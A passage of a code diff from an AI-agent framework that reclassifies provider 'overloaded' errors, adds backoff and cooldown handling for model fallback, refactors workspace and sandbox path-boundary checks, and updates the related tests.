expect(result.model).toBe("mock-2"); + expect(result.attempts[0]?.reason).toBe("overloaded"); + expect(result.result.payloads?.[0]?.text ?? "").toContain("fallback ok"); + + const usageStats = await readUsageStats(agentDir); + expect(typeof usageStats["openai:p1"]?.cooldownUntil).toBe("number"); + expect(usageStats["openai:p1"]?.failureCounts).toMatchObject({ overloaded: 1 }); + expect(typeof usageStats["groq:p1"]?.lastUsed).toBe("number"); + + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(2); + const firstCall = runEmbeddedAttemptMock.mock.calls[0]?.[0] as + | { provider?: string } + | undefined; + const secondCall = runEmbeddedAttemptMock.mock.calls[1]?.[0] as + | { provider?: string } + | undefined; + expect(firstCall).toBeDefined(); + expect(secondCall).toBeDefined(); + expect(firstCall?.provider).toBe("openai"); + expect(secondCall?.provider).toBe("groq"); + expect(computeBackoffMock).toHaveBeenCalledTimes(1); + expect(sleepWithAbortMock).toHaveBeenCalledTimes(1); + }); + }); + + it("surfaces a bounded overloaded summary when every fallback candidate is overloaded", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + mockAllProvidersOverloaded(); + + let thrown: unknown; + try { + await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:all-overloaded", + runId: "run:all-overloaded", + }); + } catch (err) { + thrown = err; + } + + expect(thrown).toBeInstanceOf(Error); + expect((thrown as Error).message).toMatch(/^All models failed \(2\): /); + expect((thrown as Error).message).toMatch( + /openai\/mock-1: .* \(overloaded\) \| groq\/mock-2: .* \(overloaded\)/, + ); + + const usageStats = await readUsageStats(agentDir); + expect(typeof usageStats["openai:p1"]?.cooldownUntil).toBe("number"); + expect(typeof usageStats["groq:p1"]?.cooldownUntil).toBe("number"); + expect(usageStats["openai:p1"]?.failureCounts).toMatchObject({ overloaded: 1 }); + expect(usageStats["groq:p1"]?.failureCounts).toMatchObject({ overloaded: 1 }); + expect(usageStats["openai:p1"]?.disabledUntil).toBeUndefined(); + expect(usageStats["groq:p1"]?.disabledUntil).toBeUndefined(); + + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(2); + expect(computeBackoffMock).toHaveBeenCalledTimes(2); + expect(sleepWithAbortMock).toHaveBeenCalledTimes(2); + }); + }); + + it("probes a provider already in overloaded cooldown before falling back", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + const now = Date.now(); + await writeAuthStore(agentDir, { + "openai:p1": { + lastUsed: 1, + cooldownUntil: now + 60_000, + failureCounts: { overloaded: 2 }, + }, + "groq:p1": { lastUsed: 2 }, + }); + mockPrimaryOverloadedThenFallbackSuccess(); + + const result = await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:overloaded-probe-fallback", + runId: "run:overloaded-probe-fallback", + }); + + expect(result.provider).toBe("groq"); + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(2); + const firstCall = runEmbeddedAttemptMock.mock.calls[0]?.[0] as + | { provider?: string; authProfileId?: string } + | undefined; + const secondCall = runEmbeddedAttemptMock.mock.calls[1]?.[0] as + | { provider?: string } + | undefined; + expect(firstCall).toBeDefined(); + expect(secondCall).toBeDefined(); + expect(firstCall?.provider).toBe("openai"); + expect(firstCall?.authProfileId).toBe("openai:p1"); + expect(secondCall?.provider).toBe("groq"); + }); + }); + + it("persists overloaded cooldown across turns while still allowing one probe and fallback", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + mockPrimaryOverloadedThenFallbackSuccess(); + + const firstResult = await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:overloaded-two-turns:first", + runId: "run:overloaded-two-turns:first", + }); + + expect(firstResult.provider).toBe("groq"); + + runEmbeddedAttemptMock.mockClear(); + computeBackoffMock.mockClear(); + sleepWithAbortMock.mockClear(); + + mockPrimaryOverloadedThenFallbackSuccess(); + + const secondResult = await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:overloaded-two-turns:second", + runId: "run:overloaded-two-turns:second", + }); + + expect(secondResult.provider).toBe("groq"); + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(2); + + const firstCall = runEmbeddedAttemptMock.mock.calls[0]?.[0] as + | { provider?: string; authProfileId?: string } + | undefined; + const secondCall = runEmbeddedAttemptMock.mock.calls[1]?.[0] as + | { provider?: string } + | undefined; + expect(firstCall).toBeDefined(); + expect(secondCall).toBeDefined(); + expect(firstCall?.provider).toBe("openai"); + expect(firstCall?.authProfileId).toBe("openai:p1"); + expect(secondCall?.provider).toBe("groq"); + + const usageStats = await readUsageStats(agentDir); + expect(typeof usageStats["openai:p1"]?.cooldownUntil).toBe("number"); + expect(usageStats["openai:p1"]?.failureCounts).toMatchObject({ overloaded: 2 }); + expect(computeBackoffMock).toHaveBeenCalledTimes(1); + expect(sleepWithAbortMock).toHaveBeenCalledTimes(1); + }); + }); + + it("keeps bare service-unavailable failures in the timeout lane without persisting cooldown", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + runEmbeddedAttemptMock.mockImplementation(async (params: unknown) => { + const attemptParams = params as { provider: string }; + if (attemptParams.provider === "openai") { + return makeAttempt({ + assistantTexts: [], + lastAssistant: buildAssistant({ + provider: "openai", + model: "mock-1", + stopReason: "error", + errorMessage: "LLM error: service unavailable", + }), + }); + } + if (attemptParams.provider === "groq") { + return makeAttempt({ + assistantTexts: ["fallback ok"], + lastAssistant: buildAssistant({ + provider: "groq", + model: "mock-2", + stopReason: "stop", + content: [{ type: "text", text: "fallback ok" }], + }), + }); + } + throw new Error(`Unexpected provider ${attemptParams.provider}`); + }); + + const result = await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:timeout-cross-provider", + runId: "run:timeout-cross-provider", + }); + + expect(result.provider).toBe("groq"); + expect(result.attempts[0]?.reason).toBe("timeout"); + + const usageStats = await readUsageStats(agentDir); + expect(usageStats["openai:p1"]?.cooldownUntil).toBeUndefined(); + expect(usageStats["openai:p1"]?.failureCounts).toBeUndefined(); + expect(computeBackoffMock).not.toHaveBeenCalled(); + expect(sleepWithAbortMock).not.toHaveBeenCalled(); + }); + }); + + it("rethrows AbortError during overload backoff instead of falling through fallback", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + const controller = new AbortController(); + mockPrimaryOverloadedThenFallbackSuccess(); + sleepWithAbortMock.mockImplementationOnce(async () => { + controller.abort(); + throw new Error("aborted"); + }); + + await expect( + runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:overloaded-backoff-abort", + runId: "run:overloaded-backoff-abort", + abortSignal: controller.signal, + }), + ).rejects.toMatchObject({ + name: "AbortError", + message: "Operation aborted", + }); + + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(1); + const firstCall = runEmbeddedAttemptMock.mock.calls[0]?.[0] as + | { provider?: string } + | undefined; + expect(firstCall?.provider).toBe("openai"); + }); + }); +}); diff --git a/src/agents/model-fallback.test.ts b/src/agents/model-fallback.test.ts index 69a9ba01a29..6379d6e0222 100644 --- a/src/agents/model-fallback.test.ts +++ b/src/agents/model-fallback.test.ts @@ -1062,7 +1062,7 @@ describe("runWithModelFallback", () => { describe("fallback behavior with provider cooldowns", () => { async function makeAuthStoreWithCooldown( provider: string, - reason: "rate_limit" | "auth" | "billing", + reason: "rate_limit" | "overloaded" | "auth" | "billing", ): Promise<{ store: AuthProfileStore; dir: string }> { const tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-test-")); const now = Date.now(); @@ -1073,12 +1073,12 @@ describe("runWithModelFallback", () => { }, usageStats: { [`${provider}:default`]: - reason === "rate_limit" + reason === "rate_limit" || reason === "overloaded" ? { - // Real rate-limit cooldowns are tracked through cooldownUntil - // and failureCounts, not disabledReason. + // Transient cooldown reasons are tracked through + // cooldownUntil and failureCounts, not disabledReason. cooldownUntil: now + 300000, - failureCounts: { rate_limit: 1 }, + failureCounts: { [reason]: 1 }, } : { // Auth/billing issues use disabledUntil @@ -1117,7 +1117,37 @@ describe("runWithModelFallback", () => { expect(result.result).toBe("sonnet success"); expect(run).toHaveBeenCalledTimes(1); // Primary skipped, fallback attempted expect(run).toHaveBeenNthCalledWith(1, "anthropic", "claude-sonnet-4-5", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, + }); + }); + + it("attempts same-provider fallbacks during overloaded cooldown", async () => { + const { dir } = await makeAuthStoreWithCooldown("anthropic", "overloaded"); + const cfg = makeCfg({ + agents: { + defaults: { + model: { + primary: "anthropic/claude-opus-4-6", + fallbacks: ["anthropic/claude-sonnet-4-5", "groq/llama-3.3-70b-versatile"], + }, + }, + }, + }); + + const run = vi.fn().mockResolvedValueOnce("sonnet success"); + + const result = await runWithModelFallback({ + cfg, + provider: "anthropic", + model: "claude-opus-4-6", + run, + agentDir: dir, + }); + + expect(result.result).toBe("sonnet success"); + expect(run).toHaveBeenCalledTimes(1); + expect(run).toHaveBeenNthCalledWith(1, "anthropic", "claude-sonnet-4-5", { + allowTransientCooldownProbe: true, }); }); @@ -1224,7 +1254,7 @@ describe("runWithModelFallback", () => { expect(result.result).toBe("groq success"); expect(run).toHaveBeenCalledTimes(2); expect(run).toHaveBeenNthCalledWith(1, "anthropic", "claude-sonnet-4-5", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, }); // Rate limit allows attempt expect(run).toHaveBeenNthCalledWith(2, "groq", "llama-3.3-70b-versatile"); // Cross-provider works }); diff --git a/src/agents/model-fallback.ts b/src/agents/model-fallback.ts index f1c99d26a70..517c4448a27 100644 --- a/src/agents/model-fallback.ts +++ b/src/agents/model-fallback.ts @@ -34,7 +34,7 @@ type ModelCandidate = { }; export type ModelFallbackRunOptions = { - allowRateLimitCooldownProbe?: boolean; + allowTransientCooldownProbe?: boolean; }; type ModelFallbackRunFn = ( @@ -428,11 +428,11 @@ function resolveCooldownDecision(params: { } // For primary: try when requested model or when probe allows. - // For same-provider fallbacks: only relax cooldown on rate_limit, which - // is commonly model-scoped and can recover on a sibling model. + // For same-provider fallbacks: only relax cooldown on transient provider + // limits, which are often model-scoped and can recover on a sibling model. const shouldAttemptDespiteCooldown = (params.isPrimary && (!params.requestedModel || shouldProbe)) || - (!params.isPrimary && inferredReason === "rate_limit"); + (!params.isPrimary && (inferredReason === "rate_limit" || inferredReason === "overloaded")); if (!shouldAttemptDespiteCooldown) { return { type: "skip", @@ -514,8 +514,8 @@ export async function runWithModelFallback(params: { if (decision.markProbe) { lastProbeAttempt.set(probeThrottleKey, now); } - if (decision.reason === "rate_limit") { - runOptions = { allowRateLimitCooldownProbe: true }; + if (decision.reason === "rate_limit" || decision.reason === "overloaded") { + runOptions = { allowTransientCooldownProbe: true }; } } } diff --git a/src/agents/model-scan.ts b/src/agents/model-scan.ts index 3fe131d9d3d..a0f05e05475 100644 --- a/src/agents/model-scan.ts +++ b/src/agents/model-scan.ts @@ -262,7 +262,7 @@ async function probeTool( const message = await withTimeout(timeoutMs, (signal) => complete(model, context, { apiKey, - maxTokens: 32, + maxTokens: 256, temperature: 0, toolChoice: "required", signal, diff --git a/src/agents/model-tool-support.test.ts b/src/agents/model-tool-support.test.ts new file mode 100644 index 00000000000..22fa511e892 --- /dev/null +++ b/src/agents/model-tool-support.test.ts @@ -0,0 +1,16 @@ +import { describe, expect, it } from "vitest"; +import { supportsModelTools } from "./model-tool-support.js"; + +describe("supportsModelTools", () => { + it("defaults to true when the model has no compat override", () => { + expect(supportsModelTools({} as never)).toBe(true); + }); + + it("returns true when compat.supportsTools is true", () => { + expect(supportsModelTools({ compat: { supportsTools: true } } as never)).toBe(true); + }); + + it("returns false when compat.supportsTools is false", () => { + expect(supportsModelTools({ compat: { supportsTools: false } } as never)).toBe(false); + }); +}); diff --git a/src/agents/model-tool-support.ts b/src/agents/model-tool-support.ts new file mode 100644 index 00000000000..2b68b6347b3 --- /dev/null +++ b/src/agents/model-tool-support.ts @@ -0,0 +1,7 @@ +export function supportsModelTools(model: { compat?: unknown }): boolean { + const compat = + model.compat && typeof model.compat === "object" + ? (model.compat as { supportsTools?: boolean }) + : undefined; + return compat?.supportsTools !== false; +} diff --git a/src/agents/path-policy.ts b/src/agents/path-policy.ts index e289ee406cb..f6960bf9500 100644 --- a/src/agents/path-policy.ts +++ b/src/agents/path-policy.ts @@ -19,6 +19,33 @@ function throwPathEscapesBoundary(params: { throw new Error(`Path escapes ${boundary}${suffix}: ${params.candidate}`); } +function validateRelativePathWithinBoundary(params: { + relativePath: string; + isAbsolutePath: (path: string) => boolean; + options?: RelativePathOptions; + rootResolved: string; + candidate: string; +}): string { + if (params.relativePath === "" || params.relativePath === ".") { + if (params.options?.allowRoot) { + return ""; + } + throwPathEscapesBoundary({ + options: params.options, + rootResolved: params.rootResolved, + candidate: params.candidate, + }); + } + if (params.relativePath.startsWith("..") || params.isAbsolutePath(params.relativePath)) { + throwPathEscapesBoundary({ + options: params.options, + rootResolved: params.rootResolved, + candidate: params.candidate, + }); + } + return params.relativePath; +} + function toRelativePathUnderRoot(params: { root: string; candidate: string; @@ -35,47 +62,44 @@ function toRelativePathUnderRoot(params: { const rootForCompare = normalizeWindowsPathForComparison(rootResolved); const targetForCompare = normalizeWindowsPathForComparison(resolvedCandidate); const relative = path.win32.relative(rootForCompare, targetForCompare); - if (relative === "" || relative === ".") { - if (params.options?.allowRoot) { - return ""; - } - throwPathEscapesBoundary({ - options: params.options, - rootResolved, - candidate: params.candidate, - }); - } - if (relative.startsWith("..") || path.win32.isAbsolute(relative)) { - throwPathEscapesBoundary({ - options: params.options, - rootResolved, - candidate: params.candidate, - }); - } - return relative; + return validateRelativePathWithinBoundary({ + relativePath: relative, + isAbsolutePath: path.win32.isAbsolute, + options: params.options, + rootResolved, + candidate: params.candidate, + }); } const rootResolved = path.resolve(params.root); const resolvedCandidate = path.resolve(resolvedInput); const relative = path.relative(rootResolved, resolvedCandidate); - if (relative === "" || relative === ".") { - if (params.options?.allowRoot) { - return ""; - } - throwPathEscapesBoundary({ - options: params.options, - rootResolved, - candidate: params.candidate, - }); - } - if (relative.startsWith("..") || path.isAbsolute(relative)) { - throwPathEscapesBoundary({ - options: params.options, - rootResolved, - candidate: params.candidate, - }); - } - return relative; + return validateRelativePathWithinBoundary({ + relativePath: relative, + isAbsolutePath: path.isAbsolute, + options: params.options, + rootResolved, + candidate: params.candidate, + }); +} + +function toRelativeBoundaryPath(params: { + root: string; + candidate: string; + options?: Pick; + boundaryLabel: string; + includeRootInError?: boolean; +}): string { + return toRelativePathUnderRoot({ + root: params.root, + candidate: params.candidate, + options: { + allowRoot: params.options?.allowRoot, + cwd: params.options?.cwd, + boundaryLabel: params.boundaryLabel, + includeRootInError: params.includeRootInError, + }, + }); } export function toRelativeWorkspacePath( @@ -83,14 +107,11 @@ export function toRelativeWorkspacePath( candidate: string, options?: Pick, ): string { - return toRelativePathUnderRoot({ + return toRelativeBoundaryPath({ root, candidate, - options: { - allowRoot: options?.allowRoot, - cwd: options?.cwd, - boundaryLabel: "workspace root", - }, + options, + boundaryLabel: "workspace root", }); } @@ -99,15 +120,12 @@ export function toRelativeSandboxPath( candidate: string, options?: Pick, ): string { - return toRelativePathUnderRoot({ + return toRelativeBoundaryPath({ root, candidate, - options: { - allowRoot: options?.allowRoot, - cwd: options?.cwd, - boundaryLabel: "sandbox root", - includeRootInError: true, - }, + options, + boundaryLabel: "sandbox root", + includeRootInError: true, }); } diff --git a/src/agents/pi-embedded-helpers.isbillingerrormessage.test.ts b/src/agents/pi-embedded-helpers.isbillingerrormessage.test.ts index 9eb2657158b..4919bc607c0 100644 --- a/src/agents/pi-embedded-helpers.isbillingerrormessage.test.ts +++ b/src/agents/pi-embedded-helpers.isbillingerrormessage.test.ts @@ -509,12 +509,12 @@ describe("classifyFailoverReason", () => { it("classifies documented provider error messages", () => { expect(classifyFailoverReason(OPENAI_RATE_LIMIT_MESSAGE)).toBe("rate_limit"); expect(classifyFailoverReason(GEMINI_RESOURCE_EXHAUSTED_MESSAGE)).toBe("rate_limit"); - expect(classifyFailoverReason(ANTHROPIC_OVERLOADED_PAYLOAD)).toBe("rate_limit"); + expect(classifyFailoverReason(ANTHROPIC_OVERLOADED_PAYLOAD)).toBe("overloaded"); expect(classifyFailoverReason(OPENROUTER_CREDITS_MESSAGE)).toBe("billing"); expect(classifyFailoverReason(TOGETHER_PAYMENT_REQUIRED_MESSAGE)).toBe("billing"); - expect(classifyFailoverReason(TOGETHER_ENGINE_OVERLOADED_MESSAGE)).toBe("timeout"); + expect(classifyFailoverReason(TOGETHER_ENGINE_OVERLOADED_MESSAGE)).toBe("overloaded"); expect(classifyFailoverReason(GROQ_TOO_MANY_REQUESTS_MESSAGE)).toBe("rate_limit"); - expect(classifyFailoverReason(GROQ_SERVICE_UNAVAILABLE_MESSAGE)).toBe("timeout"); + expect(classifyFailoverReason(GROQ_SERVICE_UNAVAILABLE_MESSAGE)).toBe("overloaded"); }); it("classifies internal and compatibility error messages", () => { @@ -572,25 +572,29 @@ describe("classifyFailoverReason", () => { "rate_limit", ); }); - it("classifies provider high-demand / service-unavailable messages as rate_limit", () => { + it("classifies provider high-demand / service-unavailable messages as overloaded", () => { expect( classifyFailoverReason( "This model is currently experiencing high demand. Please try again later.", ), - ).toBe("rate_limit"); - // "service unavailable" combined with overload/capacity indicator → rate_limit + ).toBe("overloaded"); + // "service unavailable" combined with overload/capacity indicator → overloaded // (exercises the new regex — none of the standalone patterns match here) - expect(classifyFailoverReason("service unavailable due to capacity limits")).toBe("rate_limit"); + expect(classifyFailoverReason("service unavailable due to capacity limits")).toBe("overloaded"); expect( classifyFailoverReason( '{"error":{"code":503,"message":"The model is overloaded. Please try later","status":"UNAVAILABLE"}}', ), - ).toBe("rate_limit"); + ).toBe("overloaded"); }); it("classifies bare 'service unavailable' as timeout instead of rate_limit (#32828)", () => { // A generic "service unavailable" from a proxy/CDN should stay retryable, // but it should not be treated as provider overload / rate limit. expect(classifyFailoverReason("LLM error: service unavailable")).toBe("timeout"); + expect(classifyFailoverReason("503 Internal Database Error")).toBe("timeout"); + // Raw 529 text without explicit overload keywords still classifies as overloaded. + expect(classifyFailoverReason("529 API is busy")).toBe("overloaded"); + expect(classifyFailoverReason("529 Please try again")).toBe("overloaded"); }); it("classifies zhipuai Weekly/Monthly Limit Exhausted as rate_limit (#33785)", () => { expect( diff --git a/src/agents/pi-embedded-helpers.sanitize-session-messages-images.removes-empty-assistant-text-blocks-but-preserves.test.ts b/src/agents/pi-embedded-helpers.sanitize-session-messages-images.removes-empty-assistant-text-blocks-but-preserves.test.ts index 4b1071de56e..b51e93009b4 100644 --- a/src/agents/pi-embedded-helpers.sanitize-session-messages-images.removes-empty-assistant-text-blocks-but-preserves.test.ts +++ b/src/agents/pi-embedded-helpers.sanitize-session-messages-images.removes-empty-assistant-text-blocks-but-preserves.test.ts @@ -5,15 +5,17 @@ import { sanitizeGoogleTurnOrdering, sanitizeSessionMessagesImages, } from "./pi-embedded-helpers.js"; -import { castAgentMessages } from "./test-helpers/agent-message-fixtures.js"; +import { + castAgentMessages, + makeAgentAssistantMessage, +} from "./test-helpers/agent-message-fixtures.js"; let testTimestamp = 1; const nextTimestamp = () => testTimestamp++; function makeToolCallResultPairInput(): Array { return [ - { - role: "assistant", + makeAgentAssistantMessage({ content: [ { type: "toolCall", @@ -22,20 +24,10 @@ function makeToolCallResultPairInput(): Array { it("does not synthesize tool call input when missing", async () => { const input = castAgentMessages([ - { - role: "assistant", - content: [{ type: "toolCall", id: "call_1", name: "read" }], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - stopReason: "toolUse", - timestamp: nextTimestamp(), - }, + makeOpenAiResponsesAssistantMessage([ + { type: "toolCall", id: "call_1", name: "read", arguments: {} }, + ]), ]); const out = await sanitizeSessionMessagesImages(input, "test"); @@ -124,26 +123,10 @@ describe("sanitizeSessionMessagesImages", () => { it("removes empty assistant text blocks but preserves tool calls", async () => { const input = castAgentMessages([ - { - role: "assistant", - content: [ - { type: "text", text: "" }, - { type: "toolCall", id: "call_1", name: "read", arguments: {} }, - ], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - stopReason: "toolUse", - timestamp: nextTimestamp(), - }, + makeOpenAiResponsesAssistantMessage([ + { type: "text", text: "" }, + { type: "toolCall", id: "call_1", name: "read", arguments: {} }, + ]), ]); const out = await sanitizeSessionMessagesImages(input, "test"); @@ -189,33 +172,7 @@ describe("sanitizeSessionMessagesImages", () => { }); it("sanitizes tool IDs in images-only mode when explicitly enabled", async () => { - const input = castAgentMessages([ - { - role: "assistant", - content: [{ type: "toolCall", id: "call_123|fc_456", name: "read", arguments: {} }], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - stopReason: "toolUse", - timestamp: nextTimestamp(), - }, - { - role: "toolResult", - toolCallId: "call_123|fc_456", - toolName: "read", - content: [{ type: "text", text: "ok" }], - isError: false, - timestamp: nextTimestamp(), - }, - ]); + const input = makeToolCallResultPairInput(); const out = await sanitizeSessionMessagesImages(input, "test", { sanitizeMode: "images-only", @@ -297,39 +254,11 @@ describe("sanitizeSessionMessagesImages", () => { const input = castAgentMessages([ { role: "user", content: "hello", timestamp: nextTimestamp() } satisfies UserMessage, { - role: "assistant", - stopReason: "error", - content: [], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - timestamp: nextTimestamp(), - } satisfies AssistantMessage, + ...makeEmptyAssistantErrorMessage(), + }, { - role: "assistant", - stopReason: "error", - content: [], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - timestamp: nextTimestamp(), - } satisfies AssistantMessage, + ...makeEmptyAssistantErrorMessage(), + }, ]); const out = await sanitizeSessionMessagesImages(input, "test"); diff --git a/src/agents/pi-embedded-helpers/errors.ts b/src/agents/pi-embedded-helpers/errors.ts index e7cd440d779..5e4fc4c541e 100644 --- a/src/agents/pi-embedded-helpers/errors.ts +++ b/src/agents/pi-embedded-helpers/errors.ts @@ -293,13 +293,17 @@ export function classifyFailoverReasonFromHttpStatus( if (status === 408) { return "timeout"; } - // Keep the status-only path conservative and behavior-preserving. - // Message-path HTTP heuristics are broader and should not leak in here. - if (status === 502 || status === 503 || status === 504) { + if (status === 503) { + if (message && isOverloadedErrorMessage(message)) { + return "overloaded"; + } + return "timeout"; + } + if (status === 502 || status === 504) { return "timeout"; } if (status === 529) { - return "rate_limit"; + return "overloaded"; } if (status === 400) { // Some providers return quota/balance errors under HTTP 400, so do not @@ -854,13 +858,6 @@ export function classifyFailoverReason(raw: string): FailoverReason | null { if (isModelNotFoundErrorMessage(raw)) { return "model_not_found"; } - if (isTransientHttpError(raw)) { - // Treat transient 5xx provider failures as retryable transport issues. - return "timeout"; - } - if (isJsonApiInternalServerError(raw)) { - return "timeout"; - } if (isPeriodicUsageLimitErrorMessage(raw)) { return isBillingErrorMessage(raw) ? "billing" : "rate_limit"; } @@ -868,7 +865,19 @@ export function classifyFailoverReason(raw: string): FailoverReason | null { return "rate_limit"; } if (isOverloadedErrorMessage(raw)) { - return "rate_limit"; + return "overloaded"; + } + if (isTransientHttpError(raw)) { + // 529 is always overloaded, even without explicit overload keywords in the body. + const status = extractLeadingHttpStatus(raw.trim()); + if (status?.code === 529) { + return "overloaded"; + } + // Treat remaining transient 5xx provider failures as retryable transport issues. + return "timeout"; + } + if (isJsonApiInternalServerError(raw)) { + return "timeout"; } if (isCloudCodeAssistFormatError(raw)) { return "format"; diff --git a/src/agents/pi-embedded-helpers/types.ts b/src/agents/pi-embedded-helpers/types.ts index 86ee1c4cda1..5ae47d672d3 100644 --- a/src/agents/pi-embedded-helpers/types.ts +++ b/src/agents/pi-embedded-helpers/types.ts @@ -5,6 +5,7 @@ export type FailoverReason = | "auth_permanent" | "format" | "rate_limit" + | "overloaded" | "billing" | "timeout" | "model_not_found" diff --git a/src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts b/src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts index 8c1aef240f7..87ffa6963c9 100644 --- a/src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts +++ b/src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts @@ -9,11 +9,28 @@ import type { EmbeddedRunAttemptResult } from "./pi-embedded-runner/run/types.js const runEmbeddedAttemptMock = vi.fn<(params: unknown) => Promise>(); const resolveCopilotApiTokenMock = vi.fn(); +const { computeBackoffMock, sleepWithAbortMock } = vi.hoisted(() => ({ + computeBackoffMock: vi.fn( + ( + _policy: { initialMs: number; maxMs: number; factor: number; jitter: number }, + _attempt: number, + ) => 321, + ), + sleepWithAbortMock: vi.fn(async (_ms: number, _abortSignal?: AbortSignal) => undefined), +})); vi.mock("./pi-embedded-runner/run/attempt.js", () => ({ runEmbeddedAttempt: (params: unknown) => runEmbeddedAttemptMock(params), })); +vi.mock("../infra/backoff.js", () => ({ + computeBackoff: ( + policy: { initialMs: number; maxMs: number; factor: number; jitter: number }, + attempt: number, + ) => computeBackoffMock(policy, attempt), + sleepWithAbort: (ms: number, abortSignal?: AbortSignal) => sleepWithAbortMock(ms, abortSignal), +})); + vi.mock("../providers/github-copilot-token.js", () => ({ DEFAULT_COPILOT_API_BASE_URL: "https://api.individual.githubcopilot.com", resolveCopilotApiToken: (...args: unknown[]) => resolveCopilotApiTokenMock(...args), @@ -43,6 +60,8 @@ beforeEach(() => { vi.useRealTimers(); runEmbeddedAttemptMock.mockClear(); resolveCopilotApiTokenMock.mockReset(); + computeBackoffMock.mockClear(); + sleepWithAbortMock.mockClear(); }); const baseUsage = { @@ -252,6 +271,24 @@ const mockFailedThenSuccessfulAttempt = (errorMessage = "rate limit") => { ); }; +const mockPromptErrorThenSuccessfulAttempt = (errorMessage: string) => { + runEmbeddedAttemptMock + .mockResolvedValueOnce( + makeAttempt({ + promptError: new Error(errorMessage), + }), + ) + .mockResolvedValueOnce( + makeAttempt({ + assistantTexts: ["ok"], + lastAssistant: buildAssistant({ + stopReason: "stop", + content: [{ type: "text", text: "ok" }], + }), + }), + ); +}; + async function runAutoPinnedOpenAiTurn(params: { agentDir: string; workspaceDir: string; @@ -320,6 +357,28 @@ async function runAutoPinnedRotationCase(params: { }); } +async function runAutoPinnedPromptErrorRotationCase(params: { + errorMessage: string; + sessionKey: string; + runId: string; +}) { + runEmbeddedAttemptMock.mockClear(); + return withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + mockPromptErrorThenSuccessfulAttempt(params.errorMessage); + await runAutoPinnedOpenAiTurn({ + agentDir, + workspaceDir, + sessionKey: params.sessionKey, + runId: params.runId, + }); + + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(2); + const usageStats = await readUsageStats(agentDir); + return { usageStats }; + }); +} + function mockSingleSuccessfulAttempt() { runEmbeddedAttemptMock.mockResolvedValueOnce( makeAttempt({ @@ -639,13 +698,48 @@ describe("runEmbeddedPiAgent auth profile rotation", () => { expect(typeof usageStats["openai:p2"]?.lastUsed).toBe("number"); }); - it("rotates for overloaded prompt failures across auto-pinned profiles", async () => { + it("rotates for overloaded assistant failures across auto-pinned profiles", async () => { const { usageStats } = await runAutoPinnedRotationCase({ errorMessage: '{"type":"error","error":{"type":"overloaded_error","message":"Overloaded"}}', sessionKey: "agent:test:overloaded-rotation", runId: "run:overloaded-rotation", }); expect(typeof usageStats["openai:p2"]?.lastUsed).toBe("number"); + expect(typeof usageStats["openai:p1"]?.cooldownUntil).toBe("number"); + expect(computeBackoffMock).toHaveBeenCalledTimes(1); + expect(computeBackoffMock).toHaveBeenCalledWith( + expect.objectContaining({ + initialMs: 250, + maxMs: 1500, + factor: 2, + jitter: 0.2, + }), + 1, + ); + expect(sleepWithAbortMock).toHaveBeenCalledTimes(1); + expect(sleepWithAbortMock).toHaveBeenCalledWith(321, undefined); + }); + + it("rotates for overloaded prompt failures across auto-pinned profiles", async () => { + const { usageStats } = await runAutoPinnedPromptErrorRotationCase({ + errorMessage: '{"type":"error","error":{"type":"overloaded_error","message":"Overloaded"}}', + sessionKey: "agent:test:overloaded-prompt-rotation", + runId: "run:overloaded-prompt-rotation", + }); + expect(typeof usageStats["openai:p2"]?.lastUsed).toBe("number"); + expect(typeof usageStats["openai:p1"]?.cooldownUntil).toBe("number"); + expect(computeBackoffMock).toHaveBeenCalledTimes(1); + expect(computeBackoffMock).toHaveBeenCalledWith( + expect.objectContaining({ + initialMs: 250, + maxMs: 1500, + factor: 2, + jitter: 0.2, + }), + 1, + ); + expect(sleepWithAbortMock).toHaveBeenCalledTimes(1); + 